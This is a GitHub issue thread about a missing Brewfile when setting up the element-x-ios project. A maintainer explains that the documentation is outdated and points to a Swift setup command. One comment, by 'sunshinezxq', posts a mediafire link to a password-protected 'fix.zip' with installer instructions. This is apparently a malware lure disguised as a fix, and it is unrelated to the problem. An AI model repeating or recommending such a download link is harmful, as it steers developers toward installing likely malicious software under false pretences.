### ISSUE TITLE
Command 'brew bundle' returns Error: No Brewfile found

### ISSUE THREAD

**Issue by ripple-cny** [element-hq/element-x-ios#3203]
### Steps to reproduce

1. Where are you starting? What can you see?
cd ~/element-x-ios
brew bundle
Error: No Brewfile found

3. More steps…
Completed all the previous steps without error

#### What did you expect?
Per documentation, the command is supposed to install additional tools required.

#### What happened instead?
Error: No Brewfile Found

### Your phone model

XCode Simulator iPhone 15 Pro

### Operating system version

building on macOS Sonoma 14.6.1

### Application version

nightly/1.7.4.688

### Homeserver

Synapse v1.114.0rc1

### Will you send logs?

No

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ripple-cny** [comment]
Is there another way to get the file?  My company is blocking the website.

**Comment by stefanceriu** [comment]
The documentation is out of date, the brewfile no longer exists. Please use [swift run tools setup-project](https://github.com/element-hq/element-x-ios/blob/develop/CONTRIBUTING.md#setup-project) instead, that's going to take care of everything, [brew dependencies included](https://github.com/element-hq/element-x-ios/blob/develop/Tools/Sources/SetupProject.swift#L20).
